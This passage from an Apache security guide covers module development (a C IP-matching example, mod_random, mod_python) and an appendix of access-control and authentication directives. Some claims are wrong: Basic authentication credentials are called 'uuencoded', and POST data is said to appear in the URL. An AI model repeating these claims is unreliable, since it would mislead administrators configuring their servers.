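        }
        *value = (*value << 8) | v;
        n++;
        if (*s == '.' && n < 4) {
            s++;
            if (!isdigit((unsigned char)*s)) return -1;   /* "10." is bad */
        }
    }
    *end = s;
    return n;
}

/* Parse spec into *net; returns 0 on success, -1 on any syntax error. */
int parse_network(const char *spec, ip_net *net)
{
    const char *p = spec;
    uint32_t addr, m;
    int octets, mo;
    net->negate = (*p == '!');
    if (net->negate) p++;
    while (*p == ' ' || *p == '\t') p++;
    octets = parse_octets(p, &p, &addr);
    if (octets <= 0) return -1;
    /* Left-align the octets given; the missing ones imply the mask, as the
     * module does: "10.1" -> 0xFFFF0000, "10.1.2" -> 0xFFFFFF00. */
    addr <<= 8 * (4 - octets);
    net->netmask = 0xFFFFFFFFu << (8 * (4 - octets));
    if (*p == '/') {                            /* an explicit mask overrides */
        mo = parse_octets(p + 1, &p, &m);
        if (mo == 1 && m <= 32)                 /* prefix length, e.g. /24 */
            net->netmask = m ? 0xFFFFFFFFu << (32 - m) : 0;
        else if (mo == 4)                       /* dotted mask, e.g. /255.0.0.0 */
            net->netmask = m;
        else
            return -1;
    }
    if (*p != '\0') return -1;                  /* trailing garbage */
    net->network = addr & net->netmask;         /* drop host bits */
    return 0;
}

/* Is addr inside net? Honours '!' negation. */
int ip_matches(const ip_net *net, uint32_t addr)
{
    int inside = (addr & net->netmask) == net->network;
    return net->negate ? !inside : inside;
}

/* Parse and match in one step; -1 means the spec was invalid. */
int spec_matches(const char *spec, uint32_t addr)
{
    ip_net net;
    return parse_network(spec, &net) == 0 ? ip_matches(&net, addr) : -1;
}

uint32_t ip4(unsigned a, unsigned b, unsigned c, unsigned d)
{
    return (a << 24) | (b << 16) | (c << 8) | d;
}

int main(void)
{
    /* Constructed specs; the last two are deliberately malformed. */
    static const char *specs[] = { "10.1", "!10.1", "192.168.1.77/24",
        "172.16.0.0/255.240.0.0", "10.1.2.300", "10." };
    uint32_t client = ip4(10, 1, 200, 7);
    for (size_t i = 0; i < sizeof specs / sizeof specs[0]; i++)
        printf("%-24s -> %d\n", specs[i], spec_matches(specs[i], client));
    return 0;
}
```

Run as is, the program prints 1, 0 or -1 for each constructed spec against the client address 10.1.200.7. One caveat applies to the example and to the module alike: a match establishes only that the request arrived from a given source address, so the user name it assigns is a statement about network position, not about who is at the keyboard.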
mod_random 

mod_random, by Brian Aker of Tangent.org, is another interesting example of module 
development. As per its documentation: 

mod_random provides three services. The first service is as a redirector. You feed it URLs and it 
will redirect to random URLs that you have loaded. The second is that it provides environmental 
variables that can be used for doing ad banner systems. The third is that it can be used to 
display entire pages of random HTML. It uses its own custom handlers in combination with 
random ads and quotes that you feed into the system. 

mod_random supports five directives: 

• RandomEngine 
• RandomURL 
• RandomQuote 
• RandomAd 
• RandomHandler 

The author first established a structure for the ads, URLs, quotes, and a handler: 


typedef struct {
    int enabled;
    array_header *urls;
    array_header *section_quotes;
    array_header *ads;
    table *handlers;
} random_conf;


He set his command_rec accordingly: 

static const command_rec random_module_cmds[] = {
    {"RandomEngine", ap_set_flag_slot,
     (void *) XtOffsetOf(random_conf, enabled), OR_ALL, FLAG,
     "Use this to turn on and off random quotes."},
    {"RandomURL", add_random_url, NULL, OR_ALL, TAKE1,
     "A filename with one URL per-line."},
    {"RandomQuote", add_random_quote, NULL, OR_ALL, TAKE12,
     "Takes either a double quoted string or a filename. An "
     "optional second parameter lets you adjust what "
     "section the quote is added to."},
    {"RandomAd", add_random_ad, NULL, OR_ALL, TAKE12,
     "Takes either a double quoted string, a filename, or a "
     "directory name to read files from. An optional "
     "second parameter lets you adjust what section "
     "the ad is added to."},
    {"RandomHandler", add_handler, NULL, OR_ALL, TAKE1,
     "Enable which handled types will be supplied with ads "
     "or quotes."},
    {NULL},
};


For each randomization process, he set a handler: 

static const handler_rec random_handlers[] = {
    {"random", random_handler},
    {"random-ad-page", random_page_handler},
    {"random-quote-page", random_page_handler},
    {NULL, NULL}
};


And finally, he added the functions to handle the randomization of output. For 
example: 

static const char *add_random_url(cmd_parms *cmd, void *mconfig, char *param)
{
    FILE *file_ptr;
    char buf[HUGE_STRING_LEN];
    random_conf *cfg = (random_conf *) mconfig;
    message_bank *bank;
    struct stat sbuf;

    if (cfg->urls == NULL)
        cfg->urls = ap_make_array(cmd->pool, 5, sizeof(char *));
    if (stat(param, &sbuf) == 0) {
        /* the argument names an existing file: read one URL per line */
        if (!(file_ptr = ap_pfopen(cmd->pool, param, "r"))) {
            ap_log_error(APLOG_MARK, APLOG_ERR, cmd->server,
                         "Could not open RandomFile: %s", param);
            return NULL;
        }
        while (fgets(buf, sizeof(buf), file_ptr)) {
            *(char **) ap_push_array(cfg->urls) = ap_pstrdup(cmd->pool, buf);
        }
        ap_pfclose(cmd->pool, file_ptr);
    } else {
        /* otherwise the argument itself is the URL */
        *(char **) ap_push_array(cfg->urls) = ap_pstrdup(cmd->pool, param);
    }
    return NULL;
}


The result is that within httpd.conf, after installing and compiling mod_random, you 
can construct blocks from which Apache will throw random URLs or ads as you 
specify. 

For random URLs: 

<Location /random>
    SetHandler random
    RandomURL http://www.slashdot.org/
    RandomURL http://www.tangent.org/
    RandomURL http://www.freshmeat.net/
    RandomURL http://www.linux.org/
    RandomURL /usr/local/apache/conf/random.conf
</Location>

For random advertisements: 

<Location /ads>
    SetHandler random-ad-page
    RandomAd /usr/local/apache/servers_ad
    RandomAd /usr/local/ads/
    RandomAd "<P>This is an ad</P>"
</Location>


mod_python 

The preceding examples are intrinsically useful modules, but perform limited tasks, 
and extend Apache’s functionality in only limited, specific areas. Other modules 
exist, however, that perform more complicated operations, including the embedding 
of external language interpreters in Apache. 

One such module is mod_python. As described by Gregory Trubetskoy in its 
documentation (http://www.modpython.org/python10/), mod_python 

...is an Apache server module that embeds the Python interpreter within the server and 
provides an interface to Apache server internals as well as a basic framework for simple 
application development in this environment. The advantages of mod_python are versatility and 
speed. 

Mr. Trubetskoy is modest about his achievement: 

mod_python is an Apache module. What makes it different from most other Apache modules is 
that it itself doesn’t do anything but provide the ability to do what Apache modules written in 
C do to be done in Python. To put it another way, it delegates phase processing to user-written 
Python code. 

NOTE 

Python is an interpreted, interactive, object-oriented programming language that incorporates 
modules, exceptions, dynamic typing, high-level dynamic data types, and classes. Python 
combines power with concise syntax, and interfaces with many system calls, libraries, window 
systems, and C and C++. It’s also a great extension language for applications that demand a 
programmable interface. Finally, Python is highly portable and runs on Unix, Mac, MS-DOS, 
Windows, Windows NT, and OS/2. Learn more about Python at http://www.python.org/. 





When Apache passes control to mod_python, the module runs through the following 
steps: 

 1. Determines the interpreter to use by looking at directives currently in effect, 
    possibly the server name and the directory. 

 2. Gets or creates a subinterpreter. 

 3. Gets or creates a CallBack object. (The CallBack object is a Python object 
    whose methods provide all the functionality implemented in Python.) 

 4. Creates an mp_request object. 

 5. Calls CallBack.Dispatch() passing a reference to mp_request and the phase 
    name being processed. 

 6. Instantiates a request object, a wrapper around mp_request. 

 7. Establishes sys.path by prepending the directory being accessed. 

 8. Imports the Python module you specified in the configuration. 

 9. Locates the handler function/object inside the module. 

10. Calls the user function or object passing it a reference to a request object. 

11. Returns the return value to mod_python. 

12. Returns the return value and control to Apache. 

Trubetskoy accomplishes all this with astonishing economy. In-depth analysis of 
mod_python is beyond the scope of this chapter, but to see a superb job of module 
development, get mod_python at http://www.modpython.org/. 


Module Development Considerations 

In reference to the security of your module, other than observing standard secure 
programming practices in C or Perl, try to anticipate other problems such as logic, 
filtering, directory traversal flaws, and other issues. The following list of papers and 
other resources will help you in this regard. 

• The mod_perl Developer’s Cookbook (Sams, 2002) by Geoffrey Young, Paul 
  Lindner, and Randy Kobes. An excellent treatment of module programming that 
  currently maintains a five-star reader recommendation at Amazon. Young and 
  his fellow authors are well known in the Perl community, and have written 
  many popular modules. 

• Writing Apache Modules with Perl and C (O’Reilly & Associates, 1999) by Lincoln 
  Stein and Doug MacEachern. This book is a must-have for any Apache module 
  developer. 

• Network Programming with Perl (Addison-Wesley, 2000) by Lincoln Stein. 

• The Apache/Perl Module List. http://perl.apache.org/src/apache-modlist.html. 

• The Apache Overview HOWTO. 
  http://www.linuxdoc.org/HOWTO/Apache-Overview-HOWTO.html. 

• “The Concrete Architecture of the Apache Web Server,” Octavian Andrei Dragoi 
  and Jean Elizabeth Preston. An excellent study on how Apache operates and 
  how modules plug in. 
  http://www.math.uwaterloo.ca/~oadragoi/CS746G/a2/caa.html#apache_module. 

• “Writing Modules for Apache 1.3.” Very informative PowerPoint presentation 
  from Ken Coar on developing Apache modules. 
  http://web.golux.com/coar/slides/Writing_Modules_for_Apache_1.3.slides.ppt. 

• “LJ: At the Forge: Writing Modules for mod_perl,” Reuven M. Lerner. 
  http://www.lerner.co.il/atf/columns/3351.html. 

• “How to Build the Apache of Your Dreams,” Darren Chamberlain. 
  http://www.devshed.com/Server_Side/Administration/APACHE/page1.html. 

• “From Apache 1.3 to Apache 2.0 Modules,” Apache development team. 
  http://httpd.apache.org/docs-2.0/developer/modules.html. 

• “Apache for Developers,” Bjorn Borud. 
  http://www.devx.com/premier/mgznarch/webbuilder/1998/10oct98/bb1098/bb1098.asp. 

• “Introduction to programming for the Apache API,” Sameer Parekh. 
  http://modules.apache.org/doc/Intro_API_Prog.html. 

• “Writing Input Filters for Apache 2.0,” Ryan Bloom. 
  http://www.onlamp.com/pub/a/apache/2001/09/20/apache_2.html. 

• Ramneek Sharma, various documents on Apache. He did this for a CS course, 
  and it’s great stuff that discusses architecture, the request phase, and an 
  example. http://wiki.cs.uiuc.edu/cs427/Ramneek+Sharma. 


Summary 


Apache’s modular design makes module development a snap, and you're limited 
only by your imagination. As you'll see in Appendix F, “What’s on the CD-ROM?” 
some folks have taken this to the limit, building modules that do many wonderful 
(and sometimes strange) things. After you get a solid grasp of the Apache API, you 
should be able to make Apache do nearly anything you want. However, remember 
that while Apache’s core code is tight from a security perspective, you must also 
write tight code. Thus, always consider what effect your module might have on 
Apache’s overall security. 
Apache Security-Related Modules and Directives 


This appendix covers security-related Apache modules 
and directives, and summarizes their functionality. 


Apache modules and directives give you wide latitude in 
controlling Web resources, user authentication, proxy 
exchanges, and protocol implementation. In the following, 
you'll find summaries of each directive or module. For 
more detailed information, see the referenced chapter. 


<Limit> 

The <Limit> directive applies access control to the HTTP methods you specify. 
Methods are ways a client can request a URI (or an operation thereon) from a 
server. 


HTTP methods the <Limit> directive handles include the following: 

• CONNECT—Clients use CONNECT to request that a proxy establish a tunnel 
  connection on their behalf. 

• COPY—Clients use COPY to request that Apache create a copy of the specified 
  resource, identified by the Request-URI. 

• DELETE—Clients use the DELETE method to request that Apache delete the 
  specified resource. 

• GET—Clients use GET to request that Apache return data contained in or 
  associated with the specified URI. In other words, a GET request is a 
  straight-ahead demand for a document, file, or directory. 

• HEAD—The HEAD method is identical to the GET method, except that Apache 
  doesn’t return an Entity-Body, only a header. Why would you want such a 
  method? Because caching servers use it to check a URI’s status. Why send the 
  entire document (on a simple status query), when you can send just a header 
  instead? <Limit> handles HEAD requests the same way as GET requests. 

• LINK—Clients use LINK to request that Apache create a new link between the 
  specified pages. LINK resembles POST in its operation, but clients don’t request 
  storage space for the destination object. 

• LOCK—Clients use the LOCK method to create a lock (specified by the lockinfo 
  element) on the Request-URI. Locking has several implications, and locks are 
  themselves subject to unexpected contingencies. If a client requests (and 
  Apache allows) a lock, that lock can still—at any time—drop or disappear if 
  extraordinary circumstances arise. Different lock states exist, depending on the 
  URI’s original status: None, Shared, and Exclusive. For an in-depth look at 
  LOCK, see RFC 2518. 

• MKCOL—Clients use MKCOL to request that Apache derive a new collection (MKCOL 
  is shorthand for Make Collection). A successful MKCOL creates a new collection 
  resource at the Request-URI’s locale. For an in-depth look at the MKCOL method, 
  see RFC 2518. 

• MOVE—Clients use MOVE to request that Apache move a resource from one place 
  to another. For a move to succeed (even if Apache allows it), Apache must own 
  the URI and its elements. For example, if the URI is dynamic (composed on-the-fly 
  by two or more applications working in concert), a MOVE might not succeed 
  because Apache may not control the second or third application (or fourth, 
  fifth, and so on). For an in-depth look at MOVE, see RFC 2518. 

• OPTIONS—Clients use OPTIONS to request that Apache return all allowable 
  methods for the specified URI. In other words, the client asks what methods 
  Apache will allow for that particular resource. 

• PATCH—The PATCH method is similar to the PUT method, except that the client 
  uses PATCH to request that Apache modify the specified entity. PATCH thus 
  effectively invokes a forward-functional diff operation. PATCH is recondite and 
  works only under limited circumstances (where Apache allows it and implements 
  a cache for this purpose). 

• POST—Clients use POST to request that Apache accept user input. When you 
  send a search string, a message to be appended to a message board, or data 
  intended for a database, your client sends a POST request. In POST requests, the 
  client appends the submitted data to the request (and sometimes, this is visibly 
  noticeable in the client’s Location field, such as when you send a search term 
  and the resulting URL looks like this: 
  http://www.somehost-somewhere.com/search?term=username). 

• PROPFIND—The PROPFIND method is what the client uses to retrieve properties 
  defined on the resource identified by the Request-URI. Developers commonly 
  use the PROPFIND method in XML to ascertain the properties of an XML 
  resource and its children. For in-depth information on the PROPFIND method, 
  see RFC 2518. 

• PROPPATCH—The PROPPATCH method is what clients use to request that a server 
  add or delete properties of the specified URI. PROPPATCH requests must carry a 
  propertyupdate element. Developers sometimes use the PROPPATCH method in 
  XML to alter the properties of an XML resource and its children. For in-depth 
  information on the PROPPATCH method, see RFC 2518. 

• PUT—The PUT method is where the client requests to upload an object. 

• TRACE—The TRACE method is where the client requests a trace or, an 
  application-layer loop-back. This is to ascertain the path and all machines 
  therein—including any proxies along the route. 

• UNLINK—The UNLINK method is what a client uses to request that the server 
  remove the specified object headers (such as a hypertext link between specified 
  pages). 

• UNLOCK—The UNLOCK method is what the client uses to release a lock (specified 
  by the lockinfo element) on the Request-URI. For an in-depth look at the 
  UNLOCK method, see RFC 2518. 


It’s good form to specify access control rules elsewhere, such as in a <Directory> 
block, but the <Limit> directive will apply the specified access control to all the 
aforementioned HTTP methods. Syntax is as follows: 

<Limit HTTP-METHOD>
    Require valid-user
</Limit>

Here, HTTP-METHOD could be one or more methods. To add methods, place them in 
any order you like, but separate them by spaces. Note that <Limit> processes these in 
a case-sensitive context. Ensure that you enter your methods in uppercase. 

To learn more, see Access Control Across Many Virtual Hosts in Chapter 10, “Apache 
Network Access Control.” 


<LimitExcept> 

<LimitExcept> is useful in light of the <Limit> directive’s function. Like <Limit>, 
<LimitExcept> handles the HTTP request methods CONNECT, COPY, DELETE, GET, HEAD, 
LINK, LOCK, MKCOL, MOVE, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, PUT, TRACE, 
UNLINK and UNLOCK. 

A <LimitExcept> specification is, however, the opposite of a <Limit> specification. 
Use it when you want to limit substantially more HTTP request methods than not. 
In other words, to limit all but the GET request method, rather than use <Limit> and 
specify a huge list, simply specify GET as the only allowable method. 

For example: 

<LimitExcept GET>
    Require valid-user
</LimitExcept>

To learn more, see Access Control Across Many Virtual Hosts in Chapter 10, “Apache 
Network Access Control.” 


<VirtualHost> 

<VirtualHost> applies the access control rules you specify to one virtual host. It thus 
enables you to specify different access control rules to different virtual hosts. Indeed, 
<VirtualHost> lets you specify all properties and parameters of a virtual host that 
you can for the default or primary host, including but not limited to 

• The address 
• The ServerAdmin value 
• The DocumentRoot value 
• The ServerName value 
• Log locations 

For example: 

<VirtualHost 10.1.2.3>
    ServerAdmin webmaster@host.foo.com
    DocumentRoot /www/docs/host.foo.com
    ServerName host.foo.com
    ErrorLog logs/host.foo.com-error_log
    TransferLog logs/host.foo.com-access_log
</VirtualHost>

NOTE 

To see examples of virtual host configurations, check the Apache documentation here: 
http://httpd.apache.org/docs-2.0/vhosts/examples.html. 

To learn more, see Access Control Across Many Virtual Hosts in Chapter 10, “Apache 
Network Access Control.” 


AccessFileName 

The AccessFileName directive specifies the file that contains htpasswd access control 
rules. The prevailing tool for password-protecting Apache directories is (still) Rob 
McCool’s htpasswd. 

NOTE 

htpasswd itself has no relevant security history. However, Apache 1.2 had a buffer overflow in 
cfg_getline(), a function that read various files, including the htpasswd access files 
(.htpasswd and .htaccess, discussed next). This enabled users without the Web server UID 
to obtain such access and read such files. 

The htpasswd system historically offered access control at the user and group levels 
via three configuration files. Each file fulfilled a different function in the 
authentication process: 

• .htpasswd—This was the default name for the password database. It stored 
  username and password pairs. (.htpasswd vaguely resembles Unix’s 
  /etc/passwd in this respect.) When users requested access to the protected Web 
  directory, the server prompted them for a username and password. The server 
  then compared these user-supplied values to those stored in .htpasswd. 

• .htgroup—This was the default htpasswd groups file. It stored group membership 
  information (and in this respect, vaguely resembled Unix’s /etc/group). 

• .htaccess—This was the default htpasswd access file. It stored access rules 
  (allow, deny), the location of configuration files, the authentication method, 
  and so on. 

The AccessFileName directive tells Apache the name of your access file. This file stores 
your rules, and traditionally this was .htaccess, but today folks arbitrarily name this 
file. 

Syntax is: 

AccessFileName filename 

In this case, filename is whatever name you specify. In Apache versions prior to 1.3, 
you could specify only one such file. Today, AccessFileName takes multiple filename 
arguments. 

Also, you can nest such access files. That is, you can protect /www/documents and 
also /www/documents/anonymous; each can have a different access file with different 
rules and different access control lists. Apache thus enables you to incisively dice 
and slice access control throughout your directory hierarchies. 

To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AllowOverride 

Use the AllowOverride directive to specify what global access control directives a 
local .htaccess file can override. You specify overrides in three ways, either in 
incisive or sweeping fashion. 

AllowOverride takes three arguments: 

• All—This indicates that a local .htaccess file can override all earlier or global 
  access control rules elsewhere specified. 

• None—This indicates that a local .htaccess file cannot override any previously 
  articulated access control options. 

• Directive-Type—This indicates that a local .htaccess file can override any 
  previously articulated access control options associated with the 
  Directive-Type or types you specify. 

Directive types that an .htaccess file can override are AuthConfig (authorization 
directives), FileInfo (document types), Indexes (directory indexing), Limit (host 
access), and Options (directory features). To learn more, see Chapter 11, “Apache and 
Authentication: Who Goes There?” 


Anonymous 

The Anonymous directive, included in mod_auth_anon, grants anonymous users access 
to password-protected areas. Think of Anonymous as a second cousin to FTP’s 
anonymous user, where you send your e-mail address (or any arbitrary string) as your 
password. The difference is that Apache’s Anonymous directive grants anonymous users 
access without requiring any password. 

Syntax is: 

Anonymous user user user 

In establishing Anonymous rules, remember these conventions: 

• Anonymous takes multiple user arguments; you can specify one or several users. 

• Separate multiple user arguments by spaces (user1 user2 user3). 

• If your user IDs contain spaces (for example, "anon user"), enclose strings in 
  single or double quotes: "anon user" or 'Unknown User'. 

• The Anonymous directive processes user IDs in a case-insensitive fashion—it 
  treats Anonuser and anonuser identically. 

• If user strings contain punctuation, escape special characters such as 
  apostrophes, asterisks, brackets, or other characters that shells interpret. To do 
  so, precede such characters by a backslash (for example "I don\'t need a 
  password"). 

The Anonymous directive is part of mod_auth_anon. To learn more, see Chapter 11, 
“Apache and Authentication: Who Goes There?” 


Anonymous_Authoritative 

The Anonymous_Authoritative directive, included in mod_auth_anon, when set to on, 
denies access to all but anonymous users or user IDs. Hence, if a user enters any 
value but a valid anonymous ID, Apache denies access to the specified resource. 

Anonymous_Authoritative works with the Anonymous directive. Note that if you fail 
to specify anonymous users (using the Anonymous directive), an enabled 
Anonymous_Authoritative will deny access to everyone—including you. (This is 
because Apache would be unable to find any valid anonymous user ID.) 

Syntax is: 

Anonymous_Authoritative state 

state is either on or off. 

To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


Anonymous_LogEmail 

Anonymous_LogEmail, included in mod_auth_anon, when set to on, logs passwords that 
anonymous users provide to error_log. Hence, if users provide their e-mail addresses 
as passwords, you retain a record of them. 

NOTE 

Administrators that enable the Anonymous_Authoritative directive are optimistic about 
human nature, and as it turns out, they have good cause. In my experience, if the link that 
calls the password prompt is accompanied by a request that users provide e-mail addresses, a 
substantial number of users comply. 

Syntax is: 

Anonymous_LogEmail state 

state is either on or off. 

To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


Anonymous_MustGiveEmail 

The Anonymous_MustGiveEmail directive, included in mod_auth_anon, when set to on, 
requires anonymous users to supply their e-mail addresses as passwords. 

Syntax is: 

Anonymous_MustGiveEmail state 

state is on or off. 

To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


Anonymous_NoUserID 


The Anonymous_NoUserID directive, included in module mod_auth_anon, when set to 
on, allows users access without supplying a user ID. Hence, when the username/pass- 
word window pops up, users can simply strike the Enter key or choose OK. Either 
action is sufficient to obtain the requested URI. 


Syntax is: 


Anonymous_NoUserID state 


state is either on or off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


Anonymous_VerifyEmail 

Anonymous_VerifyEmail, included in module mod_auth_anon, when set to on, 
instructs Apache to verify—or try to verify—that visitors supply a valid e-mail 
address. To see the test, check mod_auth_anon.c, in the function 
anon_authenticate_basic_user(), beginning on line 222. Lines 255 through 272 detail 
the exchange. 

How prohibitive or stringent is the verification method? Not very: 

    if (
        /* username is OK */
        (res == OK)
        /* password been filled out ? */
        && ((!conf->anon_auth_mustemail) || strlen(sent_pw))
        /* does the password look like an email address ? */
        && ((!conf->anon_auth_verifyemail)
            || ((strpbrk("@", sent_pw) != NULL)
                && (strpbrk(".", sent_pw) != NULL)))) {

        if (conf->anon_auth_logemail && ap_is_initial_req(r)) {
            ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG_INFO, APR_SUCCESS, r,
                          "Anonymous: Passwd <%s> Accepted",
                          sent_pw ? sent_pw : "\'none\'");
        }
        return OK;
    }

Apache checks for an @ and a dot. Should it do more? No, and here’s why: If users 
want to get around such tests, they will. Writing complex routines to anticipate 
every possible user choice is a wasteful exercise. It is impractical—perhaps even 
impossible—to shell out and actually verify e-mail addresses. 

By way of comparison, Web developers sometimes force visitors to enter a telephone 
number. But developers can never verify the numbers they receive; they can barely 
validate them (the string must be void of letters and/or metacharacters, and also 
contain seven digits). Thus, Anonymous_VerifyEmail doesn’t perform exhaustive 
examinations; it merely guarantees that a malformed address will fail. 
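As an added example (not mod_auth_anon's own code), here is the same acceptance rule as a stand-alone C function run over constructed passwords, so you can see exactly which strings Anonymous_MustGiveEmail and Anonymous_VerifyEmail let through. anon_password_acceptable() is a name chosen here; its two flags stand in for the conf->anon_auth_mustemail and conf->anon_auth_verifyemail settings, and the username check (res == OK) that precedes the test in the module is left out.

```c
/* Added example, not mod_auth_anon's own code: the password acceptance rule
 * from the snippet above, isolated so it can be run on constructed inputs.
 * anon_password_acceptable() is a name chosen here; must_give_email and
 * verify_email stand in for conf->anon_auth_mustemail and
 * conf->anon_auth_verifyemail. Returns 1 if the password is accepted. */
#include <stdio.h>
#include <string.h>

int anon_password_acceptable(int must_give_email, int verify_email,
                             const char *sent_pw)
{
    if (sent_pw == NULL)
        sent_pw = "";                       /* no password supplied at all */

    /* Anonymous_MustGiveEmail on: an empty password is refused. */
    if (must_give_email && strlen(sent_pw) == 0)
        return 0;

    /* Anonymous_VerifyEmail on: the module asks only whether an '@' and a
     * '.' occur somewhere in the string (it uses strpbrk; strchr expresses
     * the same membership test). Order, count and position are not examined. */
    if (verify_email &&
        !(strchr(sent_pw, '@') != NULL && strchr(sent_pw, '.') != NULL))
        return 0;

    return 1;
}

int main(void)
{
    /* Constructed sample passwords; note which ones the rule lets through. */
    static const char *samples[] = {
        "user@example.org", "user@localhost", "@.", "..@..", "", NULL
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-18s mustemail+verify: %d  verify only: %d  neither: %d\n",
               samples[i] ? samples[i] : "(null)",
               anon_password_acceptable(1, 1, samples[i]),
               anon_password_acceptable(0, 1, samples[i]),
               anon_password_acceptable(0, 0, samples[i]));
    return 0;
}
```

Because only the presence of an '@' and a '.' is tested, a string such as "@." is accepted while "user@localhost" is not; that is the leniency the text describes, reproduced rather than corrected. When Anonymous_LogEmail writes these values to error_log, treat them as unverified, user-supplied strings rather than as an identity.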


Syntax is: 


Anonymous_VerifyEmail state 


state is either on or off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthAuthoritative 


The AuthAuthoritative directive, included in mod_auth, lets you specify whether 
Apache can pass authorization procedures to lower level modules instead of using 
simple .htaccess authentication. (This only works when Apache cannot find a 
matching userID and rule for the specified user. In all other cases, Apache proceeds 
with normal .htaccess authentication as specified in your configuration files.) 


The purpose of AuthAuthoritative is to accommodate other modules that perform 
authentication. These could be modules that perform another type of Apache-spon- 
sored authentication, or third-party modules that perform additional user authenti- 
cation. Because these modules don’t use simple .htaccess authentication, you have 
to specify what Apache should do when such cases arise. 
Syntax is: 


AuthAuthoritative state 


state is on or off. 


To instruct Apache to allow fall-through authentication (where it does pass the 
authentication procedure on to other modules), turn AuthAuthoritative off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthDBMAuthoritative 


The AuthDBMAuthoritative directive, included in mod_auth, lets you specify whether 
Apache can pass authorization procedures to lower level modules instead of using 
simple DBM-based authentication. (This only works when Apache cannot find a 
matching userID and rule for the specified user. In all other cases, Apache proceeds 
with normal DBM authentication as specified in your configuration files.) 


The purpose of AuthDBMAuthoritative is to accommodate other modules that 
perform authentication. These could be modules that perform other types of Apache- 
sponsored authentication or third-party modules that perform additional user 
authentication. Because these modules don’t use simple DBM authentication, you 
have to specify what Apache should do when such cases arise. 


Syntax is: 


AuthDBMAuthoritative state 


state is on or off. 


To instruct Apache to allow fall-through authentication (where it does pass the 
authentication procedure on to other modules), turn AuthDBMAuthoritative off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthDBMUserFile 


The AuthDBMUserFile directive, included in mod_auth, lets you specify the DBM user 
file’s name. 


Syntax is: 


AuthDBMUserFile path/filename 


path is the directory path to the DBM file, and filename is the DBM file’s name. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?”. 
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AuthDBUserFile 


The AuthDBUserFile directive, included in mod_auth, lets you specify the DB file’s
name. Such files contain username/password pairs for use in DB-based authentication
(with crypt() passwords).


Syntax is: 


AuthDBUserFile path/filename


path is the directory path to the DB file, and filename is the DB file’s name.


AuthGroupFile 


The AuthGroupFile directive, included in mod_auth, lets you specify a plain text 
group file that contains group authorization information. 


Syntax is: 


AuthGroupFile path/filename


path is the directory path to the group file, and filename is the group file’s name. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthLDAPAuthoritative 


The AuthLDAPAuthoritative directive, included in mod_auth, lets you specify whether 
Apache can pass authorization procedures to lower-level modules instead of using 
simple LDAP-based authentication. (This only works when Apache cannot find a 
matching userID and rule for the specified user. In all other cases, Apache proceeds 
with normal LDAP authentication as specified in your configuration files.) 


The purpose of AuthLDAPAuthoritative is to accommodate other modules that 
perform authentication. These could be modules that perform other types of Apache- 
sponsored authentication, or third-party modules that perform additional user 
authentication. Because these modules don’t use simple LDAP authentication, you 
have to specify what Apache should do when such cases arise. 


Syntax is: 


AuthLDAPAuthoritative state 


state is on or off. 


To instruct Apache to allow fall-through authentication (where it does pass the 
authentication procedure on to other modules), turn AuthLDAPAuthoritative off. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 
AuthName


The AuthName directive, included as a core Apache functionality, lets you specify the 
authorization realm directory’s name. AuthName takes one argument: realm-name. 


Syntax is: 


AuthName realm-name


realm-name is the directory’s realm name. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthType 


The AuthType directive, included as a core Apache functionality, lets you specify the 
user authorization type for the specified directory. 


Syntax is: 


AuthType type 


type is the authorization type, and Apache allows two of them:


• Basic—This is basic authentication, which is Apache’s standard htpasswd
variety. Note that while basic authentication provides effective password
protection, it does not protect against eavesdropping. That’s because in basic
authentication, passwords are sent in uuencoded format.


• Digest—Here, Apache uses digest-based cryptographic authentication using
MD5. MD5 belongs to a family of one-way hash functions called message digest
algorithms, and was originally defined in RFC 1321.


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


AuthUserFile 


AuthUserFile, included in mod_auth, lets you specify the location of a plain text file 
that stores username/password pairs. Passwords in such authorization files are 
crypt() encoded. 


Syntax is: 

AuthUserFile path/filename 

path is the directory path to the file; filename is whatever name you specify for the 
file. 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 
CookieExpires


The CookieExpires directive, included in mod_usertrack, lets you specify the time
when a cookie expires. CookieExpires gives you wide latitude in this regard, allowing
you to set the time in seconds, minutes, hours, weeks, months, or years.


Syntax is: 


CookieExpires time-frame 


time-frame is the period after which the cookie expires. 
Some conventions to consider when setting the time: 


• If you don’t define an expiration period, cookies that mod_usertrack generates
will persist for the current session only; they’ll expire when the user ends the
session or shuts down the client.


• You can specify an expiration period in seconds simply by supplying a number
(say, 500 for 500 seconds) as a single argument to CookieExpires.


• If you specify more complicated rules, you must enclose those rules in quotes.


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?”


CookieLog 


The CookieLog directive, included in mod_log_config, lets you specify the cookie log
filename. It is to this file that Apache will log cookie data. This is an outdated
directive, and ensures compatibility with mod_cookies.


Syntax is: 


CookieLog filename 


filename is the cookie log’s filename. Note that you needn’t specify a path here, as
the filename’s location is appended to ServerRoot’s value. Hence, if ServerRoot was
/etc/httpd, and you specified the filename my-cookie-log, Apache would store the
cookie log as /etc/httpd/my-cookie-log.


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


CookieTracking 

The CookieTracking directive, available in mod_usertrack, lets you specify whether
Apache should perform cookie tracking (and generate a cookie for each new client
request).


Syntax is:


CookieTracking state 


state is on (activate cookie tracking) or off (don’t). 


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


CustomLog 


The CustomLog directive, included in mod_log_config, lets you set a log filename, a 
log format, and a conditional environment variable for logging. 


Syntax is: 


CustomLog filename format-or-nickname env 


• filename is the log’s name (relative to ServerRoot).


• format-or-nickname is the file’s format. You can specify either a named format
available from log_formats, or a nickname. Nicknames are names that you
